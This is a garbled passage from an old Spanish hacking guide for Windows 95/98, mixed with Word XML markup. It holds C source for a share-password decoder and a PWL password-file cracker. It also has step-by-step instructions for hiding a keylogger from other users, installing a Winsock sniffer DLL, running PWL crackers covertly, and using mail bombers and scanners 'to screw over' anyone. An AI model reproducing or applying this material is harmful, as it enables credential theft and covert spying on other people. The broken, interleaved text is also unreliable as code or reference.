fact, each encoded byte directly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corresponds to the letter in the corresponding column of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unencoded password!  Ie: If I change a password "passwd" to "masswd",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only the first byte of the encrypted password will change.  Knowing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this, it is easy to see that all that needs to be done to decode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password is to find a mapping from an encoded byte to a decoded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letter.  That's what this program does.  Unfortunately, things get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 little tricky because a letter in the first column of a password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is encoded using a slightly different algorithm than a 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in the second column, and so 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There is another complexity which we do not really need to worry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about to a great extent, but we still need to be aware of.  Many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characters, when entered into a password, map to the same encoded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byte.  The best example of this is that both 'A' and 'a' are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same as far as share passwords are concerned.  There are numerous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other examples of this, and this allows us to effectively limit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range of characters we need to be able to decode.  The range of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ASCII values we will have to be able to decode turns out to be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from 32 to 159.  ASCII values higher than 159 tend to map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encoded bytes which also represent more normal ASCII values.  So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if a user manages to create a password with high ASCII values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in it, that password will still be decoded by this program.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Although the decoded password won't look the same as the original,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it will work just as well.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With all of the preliminaries out of the way, I can now move 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to describing the mapping from an encoded byte to it's corresponding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ASCII value.  I think the best way to describe this would be through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 picture of exactly how the characters from 32 to 63 are mapped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out in the code for the first letter in a password.  This table goes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beyond the 80 column format maintained in the rest of this document,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but it is really the best solution.  If the table below doesn't look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 right, load this file up in a text editor that supports greater than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80 columns.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Encoded byte (hex)    - 1F 1E 1D 1C 1B 1A 19 18 17 16 15 14 13 14 11 10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0F OE 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 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ASCII value (decimal) - 42 43 40 41 46 47 44 45 34 35 32 33 38 39 36 37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58 59 56 57 62 63 60 61 50 51 48 49 54 55 52 53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Pair #                - |_6_| |_5_| |_8_| |_7_| |_2_| |_1_| |_4_| |_3_|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|14_| |13_| |16_| |15_| |10_| |_9_| |12_| |11_|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Quad #                - |__________2__________| |__________1__________|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|__________3__________| |__________4__________|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32 byte block #       - |______________________________________________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1______________________________________________|</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"Pair #", "Quad #", and "32 byte block #" rows each are there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make the general ordering of the code more visible.  The first thing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note is that the range of encoded byte values runs from 00 to 1f.  This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will not always be the case for the first set of 32 characters.  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fact, the next set of 32 characters (ASCII 64 to ASCII 95) is not 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range of 20 to 3f in encoded form.  I never concerned myself with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predicting exactly where each of the four 32 byte ranges are aligned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within the range of 0 to 256.  In my decoding scheme, I simply specify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location of the first character in a 32 byte block (which I have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pre-determined via experimentation) and determine the locations of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rest of the characters in the block relative to the inital value.  This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amounts to a total of four hand-decoded characters for the entire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From a starting point which is given (in this case the fact that ASCII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32 is encoded as 0x15), my decoding scheme follows a pattern that is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probably already apparent to you if you have examined the above table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closely.  First, if the encoded byte number is odd, it simple subtracts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one from this byte number to get the byte number of the encoded form of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subsequent character.  This is much more simple than it sounds.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As an example, given that the code for ASCII 32 is 0x15, the program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knows that the code for ASCII 33 must be 0x14.  The tricky part is that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this is not always true for every code.  Recall that there is a different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coding scheme for each of the 8 columns in a password, and that the above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table only describes the coding scheme for the first column.  Other columns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reverse this relationship between the two ASCII values of a certain pair.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*Pairs are grouped into units of four, appearing in a predefined pattern.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In this case, the first pair (by first I mean the pair with the lowest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set of ASCII values) is put in the second slot of a quad (which contains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four pairs).  The second pair is put in the first slot, the third is put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in the fourth quad, and the fourth is put in the third quad.  This changes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depending on the specific code used (of the 8 possible).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*Quads also fill a block in the same manner, however the ordering is NOT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necessarily the same as the way pairs fit into quads!  As I described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above, there are four blocks, and they fit into the entire range of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128 values just as pairs fit into quads and quads fit into blocks,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via a pattern determined by whoever invented this encoding scheme.  It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is important to realize that the range of 128 possible encoded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values can be anywhere within the range of 0 to 256.  Ie: One block can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be positioned from 0x00 to 0x1f, while another block in the same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 can be positioned from 0xa0 to 0xbf.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 realize that the above description is a bit complex, and it doesn't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really cover much of _how_ my program decodes the the encoded values.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If you honestly can't understand a word I've said, just go back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table and really take a long look at it.  Print it out, put it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under your pillow when you go to sleep.  Sooner or later the order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of it all will dawn on you and you should be able to step through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my code and see how it derives its answer, at least for the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DecodeCharOne() routine.  Seven other tables (which I have rough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copies of here on notebook paper) were needed to come up with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seven other decoders for the seven other character places.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DecodeCharOne(unsigned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        /* Keeps track of the decoded character # minus 32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  /* Sets the current letter of the 8 char quad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  /* Sets the current quad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  /* Sets the current 32 char block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We are on this col of the table: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0x15;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This is the main loop.  It walks through each decoded character, finds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its corresponding encoded value, and looks to see if that's the same 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the encoded value we are looking for.  If it is, we have found our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decoded character!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    /* After we hit character number 8, we have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               /* to do a relative jump to the next quad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21;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switch (blockl2) {       /* After we hit the last quad, we have to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                  /* jump to the next 32 character block.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0x75;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0x55;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0xb5;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0x15;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DecodeCharOne()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DecodeCharTwo(unsigned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0xba;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r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>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0xda;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0xfa;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0x1a;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0xba;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DecodeCharTwo()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DecodeCharThree(unsigned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0x6d;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code -=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27;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0x0d;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0x2d;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0xcd;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0x6d;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DecodeCharThree()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DecodeCharFour(unsigned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0x86;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0xe6;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0xc6;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0x26;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0x86;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DecodeCharFour()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DecodeCharFive(unsigned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0x73;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25;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0x33;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code = 0x23;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0x73;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DecodeCharFive()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DecodeCharSix(unsigned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0x89;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19;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13;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0xe9;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0xc9;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0x29;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0x89;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DecodeCharSix()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DecodeCharSeven(unsigned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0xf4;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code -= 23;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9;</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ab/>
        <w:t>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0x94;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0xb4;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0x54;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0xf4;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DecodeCharSeven()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DecodeCharEight(unsigned char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i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int retval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unsigned char code = 0x4a;    /* The code for a space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while((i&lt;256) &amp;&amp; (code != *mychar))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(cletter)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6:</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 -=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7:</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cletter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switch (blockl1)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21;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blockl1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switch (blockl2)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case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0x2a;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case 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0x0a;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case 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0xea;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case 4:</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code = 0x4a;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blockl2 = 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(i == 256) retval = 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else *mychar = i + 32;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return retval;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 End of DecodeCharEight()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End of program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FIN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Cuando ejecutemos el programa nos saldra esto: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c:\&gt;sharepw   Input the byte code in hex (ex: 76 d5 09 e3):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Nos pide que introduzcamos el password en formato Hexadecimal. Hay muchas  tablas por Internet para aquellos que no tengan una.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xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5-6. Snadboy's revelation v1.1?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En este apartado hablare sobre una interesante herramienta. El Snadboy es  una tool que nos descripta los astericos de la tipica ventana que pide  password. Si hay una ventana con un password y que no entendemos porque  solo salen asteriscos, lo que tenemos que hacer es abrir el Snadboy y  situarnos al lado de la ventana de password, la ventana del Snadboy tiene  una "mira de punto", pinchamos encima de la mira y la arrastramos con el  raton sobre la ventana del password situandonos encima del password,  soltamos y en la ventana del Snadboy veremos el password descifrado.  Como nota, este programa para lo que hace, ocupa mucho en el disco duro,por  lo que puede ser un poco sospechoso o que los coders no lo han optimizado  demasiado que digamos.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5-7. Keylog95?</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programa nos sera muy util en sitio donde halla mucha gente, ya que  es un Key recoder, o sea, una peque¤a utilidad que se queda residente  en memoria y graba todos los logins y password que la gente vaya metiendo.  El programa es de sencillo manejo, pero tiene que haver unos peque¤os  requisitos, primero tener las librerias VBRUN300.DLL y QPRO200.DLL en el  directorio c:\windows\system y ademas tener un directorio llamado c:\win,  ya que es alli donde el programa grabara la informacion que obtenga, en  un fichero llamado "logx", por lo que esto quedara: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c:\win\logx</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Cuando las librerias esten metidas en el directorio System, windows creara  un icono en la carpeta de Inico, por lo que es conveniente darle un  atributo de Minimizado para que nadie lo pueda ver y asi siempre que se  arranque Windows tambien lo hara el Keylog95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5-8. Glide?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El Glide es otro programa que sirve para desencriptar un password's en  Win95/98. Al igual que el Sharepw solo lo tenemos que compiLar y ejecutar  con la salvedad que esta escrito en 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Codigo Fuente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&lt;stdio.h&gt;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&lt;string.h&gt;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&lt;process.h&gt;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&lt;stdlib.h&gt;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&lt;ctype.h&gt;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#include &lt;conio.h&gt;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unsigned char huge Data[100001];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unsigned char keystream[1001];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int Rpoint[300];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void main (int argc,char *argv[])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FILE *fd;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xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>i,j,k;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w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>size;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char ch;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char *name;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 cracked;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 sizemask;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 maxr;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 rsz;</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 pos;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int Rall[300]; /* recource allocation table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if (argc&lt;2)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printf("usage: glide filename (username)");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exit(1);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read PWL file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fd=fopen(argv[1],"rb");</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if(fd==NULL)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printf("can't open file %s",argv[1]);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exit(1);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size=0;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while(!feof(fd))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Data[size++]=fgetc(fd);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size--;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fclose(fd);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find username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name=argv[1];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if(argc&gt;2) name=argv[2];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printf("Username: %s\n",name);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ab/>
        <w:t>/* copy encrypted text into keystream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cracked=size-0x0208;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if(cracked&lt;0) cracked=0;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if(cracked&gt;1000) cracked=1000;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memcpy(keystream,Data+0x208,cracked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generate 20 bytes of keystream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for(i=0;i&lt;20;i++)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ch=toupper(name[i]);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if(ch==0)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if(ch=='.') break;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keystream[i]^=ch;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cracked=20;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find allocated recources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sizemask=keystream[0]+(keystream[1]&lt;&lt;8);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printf("Sizemask: %04X\n",sizemask);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for(i=0;i&lt;256;i++) Rall[i]=0;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maxr=0;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for(i=0x108;i&lt;0x208;i++)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if(Data[i]!=0xff)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Rall[Data[i]]++;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if (Data[i]&gt;maxr) maxr=Data[i];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maxr=(((maxr/16)+1)*16);      /* recource pointer table size appears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to be divisable by 16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search after recources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Rpoint[0]=0x0208+2*maxr+20+2;</w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>/* first recource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for(i=0;i&lt;maxr;i++)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 find size of current recource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pos=Rpoint[i];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rsz=Data[pos]+(Data[pos+1]&lt;&lt;8);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rsz^=sizemask;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printf("Analyzing block with size: %04x\t(%d:%d)\n",rsz,i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,Rall[i]);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if( (Rall[i]==0) &amp;&amp; (rsz!=0)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printf("unused resource has nonzero size !!!\n");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printf("If last line produced any : You</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may try to recover\n");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printf("press y to attempt recovery\n");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ch=getch();</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if(ch!='y') exit(0);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rsz=2;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i-=1;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ab/>
      </w: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pos+=rsz;</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 Resources have a tendency to have the wrong size for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some reason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 check for correct size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if(i&lt;maxr-1)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while(Data[pos+3]!=keystream[1])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printf(":",Data[pos+3]);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pos+=2; /* very rude may fail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pos+=2;</w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>/* include pointer in size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Rpoint[i+1]=pos;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Rpoint[maxr]=size;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insert Table data into keystream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for(i=0;i &lt;= maxr;i++)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keystream[20+2*i]^=Rpoint[i] &amp; 0x00ff;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r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:tab/>
        <w:t>keystream[21+2*i]^=(Rpoint[i] &gt;&gt; 8) &amp; 0x00ff;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cracked+=maxr*2+2;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printf("%d bytes of keystream recovered\n",cracked);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 decrypt resources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for(i=0;i &lt; maxr;i++)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rsz=Rpoint[i+1]-Rpoint[i];</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if (rsz&gt;cracked) rsz=cracked;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printf("Recource[%d] (%d)\n",i,rsz);</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for(j=0;j&lt;rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);</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printf("\n");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b/>
        <w:t>exit(0);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FIN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Cuando lo ejecutemos nos saldra lo siguiente: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c:\&gt;glide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usage: glide filename (username)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Pidiendo el fichero y el login.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5-9. Win95 anonymail v 1.0.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Este sencillo programa nos sera de gran ayuda para enviar mail anonimo. Cuando ejecutemos el programa nos saldra una ventana con los siguientes  campos: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Host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From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Subject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Solo tenemos que rellenarlos correctamente y pulsar el "send" para enviar  el mail anonimo y cuando hayamos acabado pulsar "quit".   Un programa muy sencillo que nos puede ser util. Como nota, el autor nos  advierte que nadie le envie mail anonimo con su programa, por lo que se  puede deducir que es un farol o que el programa no es tan anonimo, por  lo que el autor le habra metido un troyano.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xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>5-10. Hacker's Utility, V 1.02?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Este magnifico programa es una suite para Hackers. Para que nos entendamos,  este programa esta compuesto por muchos otros programas y asi dispones  de un paquete perfecto para un Hacker.  Cuando ejecutamos este programa nos aparecera una ventana con un menu  arriba, y cuando abramos una de estas opciones se abrira otra ventana  con mas opciones. Ahora podemos ver el menu principal compuesto por  los submenus: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File -&gt; HU setup, exit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Cracking -&gt; crack passwords -&gt; crack zip passwords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crack passwd files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passwd jackpot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words prcessing -&gt; words wizard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xtrakt words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sort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Tools -&gt; create &amp; fill a dummy fill, compare binary files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Network -&gt; finger, port scanner, ip &lt;&gt; name converter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Other Stuff -&gt; hackers's test, serial numbers, extracting/ripping sound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files, extracting/ripping graphic files, manual extract/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rip files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System -&gt; dos prompt, run custom application, shut down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Window -&gt; cascade, tile horizontal, tile vertical, arrange icons,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main toolbar, main status bar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Help -&gt; tip of day, index, using help, about Hacker's Utility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La verdad es que esta suite esta muy completa y nos sera de gran ayuda. Por  ejemplo el sistema se puede configurar en File-&gt;HU setup para que sea mas personal. Cabe destacar ciertas utilidades como los crackeadores que tiene incorporados para crackear el passwd de un Unix o romper el password de  un fichero zip. Luego en la seccion de Network, las utilidades nos seran  de mucha ayuda, como el Finger, el scaneador de puertos y el convertidor  de direcciones IP. Esto en mi opion seria lo mejor del programa pero  luego trae otras cosas que </w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tambien nos pueden servir para al menos  divertinos un rato, esto es el caso del Hacker's Test, por ejemplo podemos  activar el Port Scanner y mientras esperamos a los resultados podemos  hacer un test para saber si somos buenos Hackers.  La verdad es que es una magnifica herramienta que los Hackers de win deben  tener.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5-11. Haktek v1.1?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AL igual que el HU, Haktek, es una suite que tambien nos sera de gran  ayuda. Pero esta suite esta mas enfocada a atacar por Internet, logicamente  con el peligro que ello conlleva.  Al ejecutar el programa, se abrira una ventana en la que veremos una serie  de iconos en la parte izquierda de la ventana y una pantalla de texto que  nos explica cada icono. Empezando de arriba para abajo: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Diskette-&gt; graba la sesion (lo que esta en pantalla y lo que hallamos hecho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con el programa).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X -&gt; prepara la sesion, borrando la pantalla de texto.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-&gt; nos habla sobre sus autores.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Circulo -&gt; se¤alos un objetivo, por defecto www.microsoft.com.</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Antena -&gt; Utilidad ping.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Gafas -&gt; scaneador de puertos.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Bomba -&gt; bombardeador de correo.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Stop bomb -&gt; para protegernos de un mailbomber.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Radio -&gt; scaneador de IP'S.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Prismaticos -&gt; para enviar finger nulos.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La verdad es que es una suite muy completa y nos ayudara a joder a todo  el que se ponga por delante. Con un poco de practica dominaremos este  programa a la perfeccion.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5-12. Claymore Brute Force?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utlidad no sera de gran ayuda para desemcriptar passowrd's de un  fichero passwd de Unix. Cuando lo ejecutemos se abrira una ventana con  varias opciones, de facil manejo, para aquellos que quieren algo simple y  corriendo sobre win95. Este crackeador es de fuerza bruta pudiendo ser  algo lento.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xml:space="preserve">   5-1</w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>3. Skream's Port Listener V 2.3?</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En muchas ocasiones nos gustaria saber que pasa en nuestros puertos, esta  simple pero estupenda herramienta nos sera muy util, ya que la podemos  ejecutar y configurarla para que escuche en el puerto que queramos, asi  podemos saber quien o que esta conectado a nuestros puertos. Por defecto  el programa escucha en el puerto 139 (os suena?)</w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">  El programa nos permite escuchar en el puerto que querramos, ademas podemos  logear todo el proceso en un fichero.</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lastRenderedPageBreak/>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E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">   5-14. WSOCK32 Winsock Spy Facility Version .91</w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w: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Podemos usar esta DLL para espiar un sistema informatico, ya que es un  sniffer :), solo funciona en Win95/98. No es dificil de utilizar, los pasos  a seguir son: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#1- Copiar el WSOCK32.DLL y ubicarlo en el directorio del programa que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querramos espiar.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#2- Configurar las siguientes variables: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SET WSOCK_LOG=LOG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SET WSOCK_FLAGS=s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#3- Normalmente Windows instala el estandar WSOCK32.DLL en la siguiente ruta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C:\WINDOWS\SYSTEM\WSOCK32.DLL por eso debemos configurar el path de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nuestra DLL, en el lugar donde este de la siguiente manera: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&gt; SET WSOCK_PATH=&lt;el path de nuestro WSOCK32.DLL&gt;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#4- Ejecutar el programa WinSock.</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#5- Recibiras un mensaje que esta logeando.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#6- Ya puedes salir del programa.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#7- Busca un fichero llamado LOG.XXX donde las XXX son tres digitos en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hexadecimal.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#8- El fichero Log contendra toda la sesion del Winsock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El programa dispone de mas opciones de configuracion, que podemos ver como  usar leyendo la estupenda documentacion de trae. Ahora ya no tenemos excusa  alguna de que no podemos pillar "informacion sensible."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E0323C"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5-15. PWlTool V 4.0?</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Podemos usar esta herramienta para desencriptar los famosos pwl's. La verdad  es que es una herramienta muy interesante y potente. Al ejecutar el programa  nos aparecera una ventana con multitud de opciones, incluso el nombre del  usuario que estemos usando en el momento.   El programa nos permite buscar passwords (o sea ficheros pwl's), ademas  tambien comprueba a los usuarios. El programa lo podemos dejar en modo  zombie, eso significa que trabaja en background y no nos daremos cuenta que  esta desencriptando los passwords, ademas es el modo que se recomienda  utilizar.  Es una herramienta de considero bastante completa y vital para todo aquel  hacker de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E0323C" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205350">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00E0323C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>5-16. PwlView V 1.01?</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Volvemos con otro programa para averiguar los ficheros pwl's :) Ejecutamos  el siguiente fichero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c:\&gt;pwlview</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xml:space="preserve">  There is no security in this crazy world!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Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas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http://webdon.com, e-mail:vitas@webdon.com vitas@rocketmail.com, ICQ:3024702</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!DISCLAIMER!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!This program intended to be used for legal purpose only!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This program shows cached passwords using standard (but undocumented)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Windows API on local machine for current user (user must be logged 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There is much more powerful version of this program named pwltool</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is available at http://webdon.com/vitas . But it has larger size...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You may invoke pwlview in this way: pwlview &gt;&gt; textfile.txt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to save passwords in file (don't forget to press enter twice)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Press Enter to begin...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Y este es el mensaje que nos saca, el programa esta esperando a que pulsemos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el "boton cualquiera" para buscar los pwl's, ahora aprieto el boton y me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sale lo siguiente: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No passwords found.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Probably password caching was not used or user is not logged in.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Press Enter to quit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En mi caso sale negativo, debido a que no tengo ningun fichero pwl's :) Otro  programa que nos conviene tener en nuestras coleccion de herramientas.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490456" w:rsidRDefault="00490456"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6. Medidas De Seguridad?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En esta seccion hablare sobre varios aspectos muy importanes, logicamente  la seguridad personal, de nuestro ordenador, etc... Para que nadie pueda  jodernos aunque nos movamos por Win95/98.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490456" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490456">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">   6-1</w:t>
      </w:r>
      <w:r w:rsidR="00490456">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>. Protegiendo Nuestro Ordenador?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Nuestro ordenador corriendo con Win95/98, sera propenso a muchos tipos de  ataques diferentes. Por ello conviene estar preparado y sobre estar  alerta sobre las nuevas cosas que surgen por el mundo Underground, el mejor  medio son los e-zines y por supuesto buenos amigos por el IRC.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490456" w:rsidRDefault="00205350" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490456">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve">    6-1-1. At</w:t>
      </w:r>
      <w:r w:rsidR="00490456">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>aques Tipicos a Nuestro Windows?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Logicamente seremos muy propensos a ataques tipo DoS (denial of service),  como son el LAND, BONK, TEARDROP y por supuesto los famosos nukes, OOB,  etc ...  Para estar protegidos lo que tenemos que hacer es pasarnos por los  web's de seguridad o el de la casa Microsoft en los cuales se cuelgan  los parches de estos ataques. No siempre funcioran pero nos ahorraran  muchos disgustos en muchos casos. La gente suele ser muy propensa a estas  cosas porque no esta informada sobre estos ataques y por consiguiente no se instala los parches correspondientes.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7C0FCE"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lastRenderedPageBreak/>
        <w:t>6-1-2. Encr</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>iptacion de Nuestra Informacion?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La informacion sensible que tengamos en nuestro disco duro conviene que  este encriptada con algun buen programa de encriptacion del tipo PGP, el  cual no puede ser roto en estos tiempos.   Tambien podemos hacer uso de la Stereografia, el arte de ocultar la  informacion. Hay varios programas en Internet que nos permiten esconder  ficheros de txt en ficheros graficos o de sonido, por supuesto habra  que tener cuidado cuando hacemos estas operaciones, debido a la diferencia  de formatos entre los ficheros.   Incluso podemos encriptar todo o parte del disco duro para mayor seguridad  en nuestros datos.   Lo recomendado es usar el PGP 5.0 o incluso la version 6, las cuales nos  seran de gran utilidad para encriptar nuestros ficheros ademas como son  para Windows todo sera por las tipicas ventanas, mas facil imposible.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t xml:space="preserve">    6-1-3. Elimi</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>nar Informacion De Forma Segura?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Cuando borramos un fichero del disco duro, realmente no esta borrado, por  lo que puede ser rescatado mediante herramientas especiales. Esto no  es conveniente si por el caso nuestro ordenador cae en malos manos y nos  ha dado tiempo a borrar algunos ficheros, no serviria de nada ya que  podrian recuperar la informacion.   Para borrar ficheros que contegan informacion muy privada o no queremos  que nadie la pueda obtener, conviene borrar este fichero mediante algun  programa especial para el borrado de ficheros. Existen por Internet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programas muy buenos para ello o tambien podemos leernos un fichero  sobre este tema, de recomendable lectura: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Secure Deletion of Data from Magnetic and Solid-State Memory</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Peter Gutmann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Department of Computer Science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University of Auckland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pgut001@cs.auckland.ac.nz</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El PGP version 5 y tambien la 6, disponen de una opcion para borrar un  fichero de nuestro disco duro de forma segura o sea que no teneis excusa  para no usarla!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0FCE" w:rsidRPr="00205350" w:rsidRDefault="007C0FCE" w:rsidP="00205350">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00205350" w:rsidRPr="007C0FCE" w:rsidRDefault="007C0FCE"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6-1-4. Eliminacion De Virus?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Los virus son una de las peores pesadillas, pero en realidad no entiendo  porque, ya que son solo programas. Y no son dificiles de controlar. Solo  conviene tener un buen antivirus o varios, si, tambien los hay por internet  a patadas y gratis.   Incluso muchos virus se pueden anular mediante un par de comandos del  MS-DOS, es simplemente conocer un poco los virus, logicamente se sale de  la tematica de esta guia. Pero la realidad es que no hay que tener miedo  de los virus. Si nuestro ordenador esta infectado, lo primero que tenemos  que hacer es calmarnos, luego hacer una copia de seguridad de nuestro  disco duro (da igual si esta infectado), por si el virus, en el peor de  los casos borra el disco duro y ahora buscar una vacuna disponible.  Si fuese el caso que nuestro antivirus no quita el virus, pues simplemente  hacemos una copia y lo enviamos a alguna empresa de seguridad informatica  ya que seguro que nos sacan un antivirus. Los virus para Windows cada dia estan aumentando, por lo que conviene estar  atento de que AntiVirus los pueden eliminar. No me estoy refiriendo a virus  Macros sino a autenticos virus, incluso algunos capazes de borrar  informacion de nuestro disco duro. Estos virus disponen de tecnicas stealh, polimorficos, etc. o sea que  tened cuidado y estar alerta y tener unas buenas copias de seguridad, por  si acaso.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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   6-2</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
        <w:t>. Protegiendo Nuestras Acciones?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Esta seccion esta enfocada a esconder nuestros actos hacking por Internet.  Ya que todo lo que hagamos dejaremos huellas y por desgracia la gente no  se entera de esto y deja muchas pistas.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t xml:space="preserve">    6</w:t>
      </w:r>
      <w:r w:rsidR="007C0FCE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:eastAsia="es-ES_tradnl"/>
        </w:rPr>
